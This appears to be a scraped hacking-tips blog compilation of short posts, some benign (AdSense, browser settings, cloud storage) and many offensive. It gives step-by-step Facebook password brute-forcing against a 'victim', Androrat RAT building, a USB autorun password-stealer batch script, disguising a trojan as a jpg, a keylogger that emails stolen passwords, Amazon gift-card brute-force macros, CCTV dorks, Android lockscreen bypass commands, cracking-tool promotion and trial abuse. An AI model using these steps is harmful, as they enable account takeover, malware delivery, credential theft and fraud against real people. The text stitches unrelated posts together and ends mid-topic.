Get Fast Google Adsense Approved Tips



Firstly google have certain criteria before you blog or website to approved for google adsense.

note:
Is it not true that the blog should be 6 months old in india to get approved?

How to get approved by google adsense?

1)website must have good design , navigation and also have important pages like
Home , contact , About us(Write your name and address through which you applied the AdSense account)
, privacy policy, policy disclaimer.

2)Design: should be very neat and clean simple blog , Don't give any wired look
Google always want their users to get the best experience while browsing through any website they refer.
Maintaining a clean design with good navigation and user experience will boost your chances of getting AdSense approved in the first attempt itself.
This is one of the major guidelines where lot of people miss the basics.
Google believes that if you maintain professional color scheme on your website,
the user might be willing to come back and click on the relevant ads which are displayed under your content.
So make sure you maintain a neat and clean design before applying to AdSense.
I would recommend you to buy one professional template anywhere and get it installed on your website without effecting the loading speed or easy navigation

3)15 blog post very neat and clean , no copywrite image , rich content no copywrite from any website and before apply
make domain like admin@yourwebsite.com

4)No Third Party Ads or Programs:
Before applying to AdSense, make sure you don’t allow or place any other third party banner ad code on your website. Google (employees) will strictly look into your website manually and they hate seeing some third party ads installed in your website

5)Google Analytics Code: you must link your website to this site and you will get all information about traffic and all.

7)XML Sitemap Page: Installing a sitemap on your website can help search engine bots to index your website faster, which is again a trust factor to bots about the website trustworthiness.

8)Robots.txt:Creating Robots.txt file on your website will get rid of indexing unwanted junk onto Google
fOR MORE INFO JUST GOOGLE ITS.

Statistics show that your account will go through a faster approval process if you have more quality articles on Health, Internet Marketing, Business, Law, Technology, Entrepreneurship, Travel, Lifestyle and Social Media.






Enjoy! Follow us for more...  

HOW TO BOOST YOUR OPERA MINI EVEN WITH POOR NETWORK ?



Browse fast and faster on opera mini like ucwap and uc browser. Follow the steps below

Lunch your browser opera mini

Type this in the address box 'opera:config'

select image to be =NO
Fit text to screen=YES
Loading timeout=10/20
site and sever agent masking=NO
keep styling in Rss feed=NO
Show feed index=NO
Fold linklist=NO
Phone number detection=YES
Minimum phone number=NO
EDITING HERE
Use bitmap font=NO




Enjoy! Follow us for more... 

Bypass Android Pattern Lock from ADB Tool ?



You can bypass or disable your android pattern lock from usinh ADB (Android Debugging Bridge) Tool. You can download this tools from its official website. ADB tools work with your Window PC Linux, You can easily bypass android lockscreen from ADB Tools.

Make Sure USB Debugging is enabled in your android phone. If your Mobile USB Debugging is not enabled in your android phone, you can;t use this method.

1. Download and Install ADB Drivers in your Window PC.

2. Connect Your Android Phone with your Window PC.

3. Open Command Prompt , type adb devices and press enter.

4. Now you see your Device Name with its model number.

5. Type   one by one these commands in your Command Prompt Screen.👇👇👇

▶️ adb shell 

▶️ su     

▶️ rm /data/system/gesture.key

▶️ now enter any pattern in your android phone and you can easily bypass android pattern lockscreen from using adb in your windows

Ready to go





Enjoy! Follow us for more... 

How to change your phone from 3G to 4G¿ (Root-Required)


•Your phone must be rooted

•Install root explorer

•Search for a file called 'persist.radio.lteon'

•Open that file and change it from 'false' to 'true' save

•Reboot your phone.

You will be able to see "LTE/wcdma/gsm (auto connect)" in network mode.





Follow us for more... 

STORM Cracker Software. V 2.6.0.2

First Free And Most Flexible C# User-Configurable Cracking Program. STORM is a cracking program designed to perform website security testing. The author is not responsible for any illegal use of this program. Please report bugs by sending an email to bugs[at]stormapp.org STORM is a cracking program designed to perform website security testing.
The project started in January 2018 by MR.Viper.

Requirements:
Microsoft .NET Framework 4.7.2
Windows 7 or Later


Features:
Supports FTP checking!
Built-in Javascript Executor.
Brotli Decompression.
Possible use both FTP, HTTP stages in one config
Unlimited stages are are supported
Debug form for analyze and check settings, send and receive data
Load up to 20million combo lists!
Supports HTTP/S
Supports Socks 4/5
Supports auto update proxies, when you load fresh proxies program auto update exist proxies
Pass the CloudFlare’s Under Attack Mode.
Features an advanced configuration of all the engine stages by using special variables: in this way user is able to configure correctly the engine for very specialized cases.
Supports fully configurable Keywords Capture (useful in order to get premium account details)
Supports fully configurable Form JavaScript Redirect (useful to get the page where a premium account detail is shown)
Supports multiple additional form redirects
Supports advanced special Keywords Matching Functions
Supports encoding methods:

  • * URLEncode / URLDecode – Description: Encode/Decode an String
  • * Base64 Encode/Decode – Description: Base64 Encode/Decode an String

Supports string-related functions:

  • * Uppercase / Lowercase – Description: Upper/Lower each char of String/Text/Source
  • * Length – Description: Gets the number of characters in the provided String/Text/Source
  • * Trim / TrimStart / TrimEnd – Description: Trim And Replace Spaces at Start/End or Both part of an String/Text/Source
  • * Replace – Description: Replace an string/text/word with an string/text/word
  • * Substring – Description: Extract an string/text by providing start index and optionally length to be extracted till.
  • * CombineText – Description: Combine/Merge several strings/texts, merge order will be the order of provided arguements
  • * IndexOf – Description: Return index of an string/text in in base String/Text/Source
  • * Add – Description: Add an String/Text to the left provided arguement(s)
  • * FindTagVal – Description: Get/Extract text between two strings/word/texts
  • * RegexMatch – Description: Get/Extract Text matched by the provided Regex Pattern Based on .NET
  • * RegexMatches – Description: Get/Extract All Texts matched by the provided Regex Pattern Based on .NET
Supports crypto string methods:
  • * MD5 – Description: Encrypt an String/Text to MD5
  • * SHA – Description: Encrypt an String To SHA-1/SHA-256/SHA-384/SHA-512
  • * HMAC – Description: Encrypt an String to HMAC with several hash types (“MD5” / “RIPEMD160” / “SHA1” / “SHA256” / “SHA384” / “SHA512”)
  • * PBKDF2-HMAC-SHA256 – Description: Encrypt an String to PBKDF2-HMAC-SHA256
  • * PBKDF2-PKCS5 – Description: Encrypt an String to PBKDF2-PKCS5
-Supports other functions (will be more soon):
  • * UnixTime – Description: Return Current Timestamp (like: 1517516792.63398)
  • * UnixTimeToDate – Description: Converts Unix Timestamp to date, like: 2/28/2018
  • * If – Description: Returns one of two values depending on the value of the Boolean expression
  • And much more functions and features.




Download Here ::

GOOGLE RDP METHOD | WORKING 100% | 32 GB RAM RDP |

🌀  🌀

 Method

Things you will need

1.Temp Mail
2.Ability to read English Steps:

1. Go to https://google.qwiklabs.com/users/sign_up And sign up using TempMail

2. After sign up check TempMail inbox for activation link and sign in. Make sure to check to Remember Me Box

3. Go to https://google.qwiklabs.com/quests/70?event=Your And use code "1q-analytics-67"

4. Go to https://google.qwiklabs.com/focuses/3563?parent=catalog and click start trial and use credits.

5. Wait for it to start and then click go to the console.

6. Login using the info given by the website and Boom you have access to cloud console for 40 mins.

7. Now create A instance and use it for 40 mins Note: The RDP/Account will be deleted after 40 mins Method







Enjoy! Follow us for more... 

how to hack Facebook Account ?



Now Let's go on a our topic.

STEP-1: INSTALL TERMUX APP FROM PLAY STORE OR ANY WHERE OR CLICKHERE

STEP-2: DOWNLOAD FBBRUTE FILES FROM GIVEN LINK CLICK HERE

STEP-3: GOTO FACEBOOK AND COPY FACEBOOK ID WHICH YOU WANT TO HACK

STEP-4: GOTO BROWSER AND SEARCH "FIND YOUR FACEBOOK ID" AND OPEN WEBSITE

STEP-5: PASTE COPIED VICTIM ID INTO "SEARCHBOX" AND CLICK ON"FIND"

STEP-6: AFTER THAT YOU GET FACEBOOK PERSONAL NUMERIC ID

STEP-7: COPY YOUR "FACEBOOK PERSONAL NUMERIC ID"

STEP-8: GOTO TERMUX APP AND TYPE "pkg update" AND HIT ENTER

STEP-9: AFTER THAT ASK "Y/N" WRITE "y" AND HIT ENTER

STEP-10: NOW TYPE "pkg upgrade" AND HIT
ENTER

STEP-11: NOW TYPE "apt install python2" AND HIT ENTER

STEP-12: NOW TYPE"apt install python2-dey" AND HIT ENTER

STEP-13: NOW SEE YOUR STORED LOCATION OF "fbbrute" AND COME BACK IN TERMUX APP

STEP-14: NOW TYPE "cd /sdcard/fbbrute" AND HIT ENTER

STEP-15: NOW TYPE s AND HIT ENTER

STEP-16: NOW TYPE "python2 fbbrute.py" AND HIT ENTER

STEP-17: NOW PASTE "FACEBOOK PERSONAL NUMERIC ID" AND HIT ENTER

STEP-18: NOW TYPE "password.txt" AND HIT ENTER

STEP-19: WAIT AND YOU GET YOUR VICTIMS PASSWORD

STEP-20: COPY VICTIMS PASSWORD AND GOTO FACEBOOK

STEP-21: NOW TYPE VICTIMS"FACEBOOK PERSONAL NUMERIC ID AND PASTE COPIED VICTIMS PASSWORD AND CLICK ON LOGIN BUTTON

NOW YOU SUCCESSFULLY HACKED FACEBOOK ACCOUNT






Enjoy! Follow us for more... 

HOW TO UNLOCK LOCK PATTERN USING COMMAND PROMPT ?

🔰  🔰

🔷 Steps :-

1⃣ Connect your android phone to your computer.

2⃣ Open Command prompt administrator.

3⃣ Now in command prompt window type following code carefully  adb shell cd/data/data/com.android.providers.settings/databases sqlites settings.db  update system set value=0 where name=’lockpatternautolock’; update system set value=0 where name=’lockscreen.lockedoutpermanently’; .quit

4⃣ Now you will see some screen as shown below and then you can reboot your phone and now when your android starts again, then try unlocking it using any random pattern and it will unlock and work pretty fine.

5⃣ If you face any problem repeat same steps but instead of the above code tru using  adb shell rm/data/system/gesture.key and the press enter and now reboot your device to see if it works






Enjoy! Follow us for more... 

SENTRY MBA The most commonly used attack tool for credential stuffing

Sentry MBA is an automated attack tool used by cybercriminals to take over user accounts on major websites. With Sentry MBA, criminals can rapidly test millions of usernames and passwords to see which ones are valid on a targeted website. The tool has become incredibly popular — the Shape Security research team sees Sentry MBA attack attempts on nearly every website we protect.

An attack using Sentry MBA has three phases:
  • Targeting and attack refinement.
  • Automated account checking.
  • Monetization. Sentry MBA (and the criminal ecosystem that supports it) dramatically improve criminal productivity during the first two phases.

Sentry MBA in Credential Stuffing Attacks
A list of usernames and passwords is at the heart of every Sentry MBA attack. In Sentry MBA parlance, these are called “combo” lists. If the combo list has credentials that were valid on another website (e.g. via publicized breaches at eBay, Sony, and Ashley Madison or through phishing techniques), the attack is called “credential stuffing.” Credential stuffing works because Internet users routinely reuse passwords across web accounts. Verizon’s 2015 data breach report cites the use of stolen credentials as the most common attack action used against web applications today.


1. Targeting and Attack Refinement
Before it can test account credentials, Sentry MBA must be configured to understand the targeted login page. A Sentry MBA “config” file contains, among other items, the url for the website’s login page, field markers to help navigate form elements, and rules for valid password constructions. A number of forums offer a wide variety of working configurations for various websites. 
Once the attacker has a basic working configuration, Sentry MBA offers tools to optimize and test the attack setup against the live target website. For example, the tool can be configured to recognize certain keywords associated with a website’s responses to successful and unsuccessful login attempts. If the targeted page includes a CAPTCHA test, Sentry MBA can defeat the CAPTCHA with its optical character recognition module or with an optional database containing thousands of possible CAPTCHA images and answers. This YouTube video demonstrates the process of tuning Sentry MBA to solve CAPTCHA.

2. Automated Account Checking
Once the site configuration is optimized, attackers need only add their “combo” file and a “proxy” file to Sentry MBA to commence their attack.
Combo files are simply lists of usernames and passwords. The Darknet and open web offer many options for acquiring stolen lists of usernames and passwords. Fresh lists are often sold at a premium but other lists can be freely downloaded. 
Proxy files are lists of computers used by Sentry MBA to send login attempts to a targeted site. These lists, like combo lists, are readily available on the open web and the Dark net. Proxies make attack detection and defense far more difficult. Specifically, they undercut two common application defense strategies: IP reputation filtering and rate limiting.
How do proxies defeat IP reputation filtering (also known as “blacklisting”)? Sentry MBA proxies are compromised computers that are typically used without authorization. Cybercriminals constantly work to gain access to fresh proxies that can help evade blacklists. An analysis of a proxy-based attack at one Shape customer revealed that 60% of the proxies used in the attack were new each day. Blacklists can’t be updated quickly enough to detect compromised computers and stop them from joining attacks.
Proxies also help attackers evade defenses that rely on rate limiting. These defenses fail because the attacker’s login attempts appear to come from a large number of different computers. Sentry MBA can be tuned to ensure that no individual proxy sends too many requests, which makes rate limiting ineffective.
With a working configuration, combos, and proxies, the attack can commence. Sentry MBA coordinates proxies and collects information on which credentials successfully open an account. It even checks for what assets are available in an account and notifies the attacker when hits occur. After all the credentials in the combo list have been checked, Sentry MBA’s role in the attack is over.‍

3. Monetization
Once the cybercriminal has working credentials, they need a way to make money from their victims.Monetization strategies can take many forms. The retailer mentioned earlier was defrauded when cybercriminals transferred stored-value gift card balances out of compromised accounts to cards controlled by the cybercriminal. Sites such as giift.com, giftcardzen.com, and cardpool.com make it easy to liquidate these fraudulent cards for cash or merchandise.
Many other monetization schemes are available to cybercriminals, including extortion, account funds transfers, and acquisition of credit card information, to name a few. As cybercriminals find increasingly creative ways to monetize attacks, more and more websites become attractive targets.











Deep Web Anonymous Email Services Links

🌟🌟


http://zrwxcayqc4jgggnm.onion/ – Email – Adunanza OnionMail Server, If you want to get new anonymous email for your business or personal discussion then you may try this Darknet onion link and easily can create your brand new email address.

http://cwu7eglxcabwttzf.onion/ – Tor Emails – Confidant Mail: this is open source non-SMTP cryptographic email service, which supports optimized large file attachment, this email deep web sites offer the easiest way for PGP encryption. When you create your new account, then email service also create one public key automatically for you. For more information visit given email service deep web links.

http://scryptmaildniwm6.onion/ – Emails – Scryptmail – This end to end encrypted anonymous email service that now stored metadata, If you are highly privacy oriented person and looking any premium anonymous email service, you may try Scryptmail, but before buying any premium access you may try 7 days trial.

http://cadamailgxsy6ykq.onion/ – Email – Cicada Mail – alternative onion email service which also claiming for privacy protection. But at my site explore time, website homepage has notification about ” Site is not fully cunctional”.

http://torbox3uiot6wchz.onion/ – Tor Emails – TorBox: This is another alternative email service which you can access into Tor network and outside Tor network you can’t access this email service. If you are looking any email service which can work into hidden internet environment, then try this email service.




Enjoy! Follow us for more... 

Top websites to get 10GB to 100GB Cloud storage.

🔥 🔥

Yunpan.360.cn to get 360GB of free storage. (can be extended up to 36TB by downloading the PC and Android/iOS clients)

Ozibox.com to get 100GB of free storage.

SurDoc.com to get 100GB of free storage.

Shared.com to get 100GB of free storage.

Adrive.com to get 50GB of free storage

Mega.co.nz to get 50GB of free storage.

Hubic.com to get 25GB of free storage.

Firedrive.com to get 20GB of free storage.

Onedrive.live.com to get 15GB of free storage.

Copy.com to get 15GB of free storage.

Mediafire.com to get 10GB of free storage. (40GB more available with other activities)

Pcloud.com to get 10GB of free storage (10GB more available with other activities)

Box.com to get 10GB of free storage.




Enjoy! Follow us for more... 

How To Unroot Your Android with Katlego Keita Using SuperSU ?


✔️ Launch The SuperSU App. ..

✔️ Tap The "Settings" Tab.

✔️ Scroll Down To The "Cleanup" Section.

✔️ Tap "Full Unroot".

✔️ Read The Confirmation Prompt And Then Tap "Continue".

✔️ Reboot Your Device Once SuperSU Closes.

⚠️ Use An Unroot App If This Method Fails.





Follow us for more... 

How To Hack Android Phones With Androrat ?



In this post I am going to show you how to hack Android phones withAndrorat. In our tutorials we only EVER hack our own systems as a proof of concept and never engage in any black hat activity

Step 1: Create an account on noip.com

Step 2: Create a host on noip.com and enter Hostname and click Add Host

Step 3: Now do port forwarding on your network. Port forwarding settings changes on each moderm, so google your moderm and find out how to do port forwarding

Step 4: Download Androrat Binder and enter the Hostname  and Port. Name the file and click Go. If you want to inject this file with another .apk file then go to Build + Bindtab name apk title and browse the location of the .apk and click Go

Step 5: Now download DUC (Dynamic DNS Update Client for Windows) and install

Step 6: Open DUC and enter the host details which you have created in noip.com

Step 7: Download and run Androrat Project. Open Server tab on top and enter theport which you use on noip.com

Step 8: Now run the .apk which is created by Androrat Binder on a Android Mobile





Done,  Follow us for more... 

Amazon Gift Card Code Generator + Checker [FREE] [HQ] [VERY FAST]

🌀  🌀

free giftcard code generator with a checker!

Information : I am using firefox version 55.0 and imacros version 9.0.3. It is likely NOT TO work for you if you have different version!

1, Go to https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/

 (If it wont work with your browser, download the old version of firefox: )

https://wiki.imacros.net/iMacros_for_Firefox_Legacy#Version_History

Imacros9.0.3. http://download.imacros.net/imacros_for_firefox-9.0.3-fx.xpi

3, Right click on one of the macros and click on "Edit Macro"

4, Be sure to add something to your cart, click on it, fill your address in then go to the part where you can fill giftcards in as a payment option. -
 https://www.amazon.com/gp/buy/payselect/handlers/display.html?hasWorkingJavascript=1

5, Now paste this:

SET !ERRORIGNORE YESSET !DATASOURCE C:\Users\username\Documents\iMacros\Datasources\Codes.txtSET !DATASOURCE_COLUMNS 1SET !DATASOURCE_LINE {{!LOOP}}SET !EXTRACT_TEST_POPUP NOSET !TIMEOUT_STEP 0TAG POS=1 TYPE=input ATTR=ID:gcpromoinput CONTENT={{!COL1}}TAG POS=1 type=input ATTR=id:button-add-gcpromo

be sure to replace the source in the 2nd line to your source.

IMPORTANT:

If you want the script to automatically try to go forward in the menu (so when amazon would redirect you back to your cart or something like that) then use this script:

SET !ERRORIGNORE YESSET !DATASOURCE C:\Users\username\Documents\iMacros\Datasources\Codes.txtSET !DATASOURCE_COLUMNS 1SET !DATASOURCE_LINE {{!LOOP}}SET !EXTRACT_TEST_POPUP NOSET !TIMEOUT_STEP 0TAG POS=1 TYPE=span ATTR=id:"nav-cart-count"TAG POS=1 type=input ATTR=class:"a-button-input"TAG POS=1 type=a attr=class:"a-declarative a-button-text"TAG POS=1 type=input attr=value:"Continue"TAG POS=1 TYPE=input ATTR=ID:gcpromoinput CONTENT={{!COL1}}TAG POS=1 type=input ATTR=id:button-add-gcpromo

Checker Additions:

1, If you have copied every generated codes, paste them into a new sheet at sheets.google.com (so it will paste everything under each other)

2, Now copy those from top to bottom and paste them into a text file
3, Change the source in the second line so its the place of the script above.
4, Run your code and have fun.





Enjoy ! Follow us for more... 

HOW TO MAKE A USB STEALER ?

​​🔰🔰

◼️TUTORIAL:

open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf

open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat

copy the autorun and launch file to your USB

go to http://www.nirsoft.net/ and download the programs named in step 2

extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB

click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computer—-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer





Enjoy! Follow us for more... 

Buster - Find Emails Of A Person And Return Info Associated With Them.


Note: This information only for education purpose only

Buster is a simple OSINT tool used to:

  • Get social accounts from various sources(gravatar,about.me,myspace,skype,github,linkedin,avast)
  • Get links to where the email was found using google,twitter,darksearch and paste sites
  • Get domains registered with an email (reverse whois)
  • Generate possible emails and usernames of a person
  • Find the email of a social media account
  • Find emails from a username
  • Find the work email of a person using hunter.io



Installation-_  

clone the repository:
$ git clone git://github.com/sham00n/buster

Once you copy of the source, you can install it with:
$ cd buster/
$ python3 setup.py install
$ buster -h

Usage examples

  • Get info of a single email(exists or not,social media where email was used,data breaches,pastes and links to where it was found)

$ buster -e target@example.com

Query for list of emails:
$ buster --list emails.txt

  • Generate emails that matches the pattern and checks if they exist or not(use the -a argument if you have more info to add(ex: -a nickname fav_color phone #)

$ buster -e j********9@g****.com -f john -l doe -b ****1989

  • Generate usernames (use with -o option and input the file to recon-ng's profiler module)

$ buster -f john -m james -l doe -b 13071989

  • Generate emails (use -v if you want to validate and get info of each email)

$ buster -f john -m james -l doe -b 13071989 -p gmail.com yahoo.com

  • Generate 100+ emails in the formatusername@provider.com and returns the valid ones(use -p if you dont want all 100+)

$ buster -u johndoe

  • Generate a company email and returns info associated with it

$ buster -f john -l doe -c company.com





Follow us for more... 

BitDefender Premium Lifetime Method !



1. Go to link(https://central.bitdefender.com/home) and Register


3. Use a temporary email.

4. Paste your email, do the captcha and click "Get It Now"

5. You will get an email that will look like this: (https://imgur.com/a/M1915oz)

6. Click "Install BitDefender"

7. You will be redirected to your already existing bitdefender account

8. This message will pop up: (https://imgur.com/a/0lbhgn8), click "Apply"

9. Now you have bitdefender for 3 months!

10. When you want to renew your subscription, repeat step 2-8 , Sometimes you will never recieve the email or it will take a long time. If this happens try to use a VPN, delete cookies and try again.

This method only works up to 90 days, so if you use this method when you have 45 days left, the subscription will be renewed to 90 days again"
REPEATABLE FOREVER



Follow is for more... 

Spying CCTV cameras through Google ?

📌 This information only for education purpose only. Don't misuse it.🔰

👉 Google Dorks one of most easy, fun and powerful hacking techniques, online.

On Internet, Websites are not only to be hacked, Websites are just part of Internet.
There are many other products like Refrigerator, CCTV Cameras, Automated Doors, Televisions, Power Plants, etc. that are connected to Internet, and some of them could be accessed through google.
So, right now we will be discussing about CCTV Cameras.
Following are some Google Keyword Searches that you can simply type in into Google Search Box and find a CCTV live!

* inurl:”CgiStart?page=”
* inurl:/view.shtml
* intitle:”Live View / – AXIS
* inurl:view/view.shtml
* inurl:ViewerFrame?Mode=
* inurl:ViewerFrame?Mode=Refresh
* inurl:axis-cgi/jpg
* inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
* inurl:view/indexFrame.shtml
* inurl:view/index.shtml
* inurl:view/view.shtml
* liveapplet
* intitle:”live view” intitle:axis
* intitle:liveapplet
* allintitle:”Network Camera NetworkCamera” (disconnected)
* intitle:axis intitle:”video server”
* intitle:liveapplet inurl:LvAppl
* intitle:”EvoCam” inurl:”webcam.html”
* intitle:”Live NetSnap Cam-Server feed”
* intitle:”Live View / – AXIS”
* intitle:”Live View / – AXIS 206M”
* intitle:”Live View / – AXIS 206W”
* intitle:”Live View / – AXIS 210?
* inurl:indexFrame.shtml Axis
* inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
* intitle:start inurl:cgistart
* intitle:”WJ-NT104 Main Page”
* intitle:snc-z20 inurl:home/
* intitle:snc-cs3 inurl:home/
* intitle:snc-rz30 inurl:home/
* intitle:”sony network camera snc-p1?
* intitle:”sony network camera snc-m1?
* site:.viewnetcam.com -www.viewnetcam.com
* intitle:”Toshiba Network Camera” user login
* intitle:”netcam live image” (disconnected)
* intitle:”i-Catcher Console – Web Monitor”


Enter any of these searches in Google Search Box.

Search !

Click on any of link!

And you will see live stream of Random CCTV !

IF YOU WANT TO WATCH CCTV OF SOME SPECIFIC ORGANISATION  ... ADD NAME OF ORGANISATION AFTER THAT GOOGLE DORK !
IF IT WILL BE VULNERABLE,  YOU WILL FIND IT !





Enjoy ! Follow us for more...

5 BEST WIFI HACKING TOOLS

🔰🔰

1. AirSnort
AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes with Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has enough packets received. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords.

2. Cain & Able
Cain & Able is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. It you are trying to learn wireless security and password cracking, you should once try this tool.

3. Kismet
Kismet is the wi-fi 802.11 a/b/g/n layer2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms.

4. Airjack
Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network.

5. WepAttack
WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack.




Enjoy! Follow us for more...

Top 5 search engines on DEEP Web

 Deep Web 5 Search Engine Links

http://wikitjerrta4qgz4.onion/

http://n2ha26oplph454e6.onion/

http://link2oeowhl73s7m.onion/

http://pdizimmrq5mwjkun.onion/

http://dirnxldxoyajdetq.onion/



RARE LINK...BE ALERT & CAREFUL



USE TOR FOR PC & ORFOX + ORBOT FOR ANDROID


Enjoy ! Follow us for more...

Access Blocked Websites

🔰🔰

▪️Go To Start -> Run -> In Run box type "cmd" and hit Enter

▪️Now Open Command Prompt window will appear

▪️In command prompt type "Ping (websites Address)" and Enter

▪️For Example: If you want to access wsite, type "ping wsite.in "

▪️Now an IP Address will appear in command prompt to access facebook.com

▪️After then, type the particular IP Address (which appears in your command prompt) in address bar and open any websites.






Enjoy! Follow us for more...

How to hide your exe files into a jpg file ?


How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.





Enjoy! Follow us for more...

Let Hack Email With Keylogger (n00b stuffs)

_____________________
.
First Of All, Let Me Briefly Expalin What A Keylogger Is:-
.
What is a Keylogger?
***********
A keylogger is also called a spysoftware. Its a small program that records each and every ...keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed or attached in computer just in a few seconds and once installed you are only a step away from getting the victim’s password.
.
Now, let start
.
Keylogger:-
.
Step 1) First Download "Rin Logger" and click here for password
.
Run the keylogger file on your pc and click on Create new
.
Step 2) Now, enter the information as follows:
.
Email address: your email address (gmail recommended)
.
Account Password: Password of your Email address.
.
Keylogger Recipients: Enter your Email address
Click on next
.
Step 3) Now Enable the Attach Screenshots by hitting on it. Enter the
duration (time in minutes) to receive email Key logs.
.
After that hit "verify now If you get a message saying verify , Eben is
good to go,
click next
.
Step 4) Now enable the Install Keylogger by clicking on it. Name the
file anything you want and select Installation path as
Application Data,
click next
.
Step 5) Click on Next
.
Step 6) Now, Enable Website Viewer by clicking on it. Click on Next
option
.
Step 7) Now, Enable the Enable File Binder. Click on next.
.
Step 8) Now Enable the Steal Password Click on Next
.
Step 9) Fill all the information by yourself. And click on next.
.
Step 10) Now, hit on Save As and select the location where you want
to save your keylogger server file. And click on Compile Server. Now
Compile has been done.
.
You have successfully created a keylogger server file. Now, simply send
this file to your victim via email, once the victim runs our keylogger, we
will key logs every 10 min via emai






Enjoy! Follow us for more...

Common DDOS Attack Types

Common DDOS Attack Types

◾️ UDP Flood
◾️ ICMP (Ping) Flood
◾️ SYN Flood
◾️ Ping Of Death
◾️ Slow Loris
◾️ NTP Amplification
◾️ HTTP Flood

 UDP FLOOD

◾️ A UDP flood is a form of volumetric Denial-of-Service (DoS) attack where the attacker targets and overwhelms random ports on the host with IP packets containing User Datagram Protocol (UDP) packets. In this type of attack, the host looks for applications associated with these datagrams ◾️

 ICMP (PING) FLOOD

◾️ Ping flood, also known as ICMP flood, is a common Denial of Service (DoS) attack in which an attacker takes down a victim's computer by overwhelming it with ICMP echo requests, also known as pings ◾️

 SYN FLOOD

◾️ A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic ◾️

 Ping Of Death

◾️ A ping of death is a type of attack on a computer system that involves sending a malformed or otherwise malicious ping to a computer. A correctly-formed ping packet is typically 56 bytes in size, or 64 bytes when the Internet Protocol header is considered. However, any IPv4 packet may be as large as 65,535 bytes ◾️

 Slow Loris

◾️ Slowloris is a type of denial of service attack tool invented by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports ◾️

 NTP Amplification

◾️ NTP amplification is a type of Distributed Denial of Service (DDoS) attack in which the attacker exploits publically-accessible Network Time Protocol (NTP) servers to overwhelm the targeted with User Datagram Protocol (UDP) traffic. ... The NTP server responds by sending the list to the spoofed IP address ◾️

 HTTP Flood

◾️ HTTP Flood is a type of Distributed Denial of Service attack in which the attacker manipulates HTTP and POST unwanted requests in order to attack a web server or application. These attacks often use interconnected computers that have been taken over with the aid of malware such as Trojan Horses ◾️

(CARDING) _ How to set and destroying cookies ?

*Setting or Creating a Cookie*

-A Cookie is created when a browser is told to create one by a web server.
-As long as no Html has yet been transferred, you can call the setcookie function which has the following syntax:
*Setcookie* _( name, value, expire, path, domain, secure, httponly);_
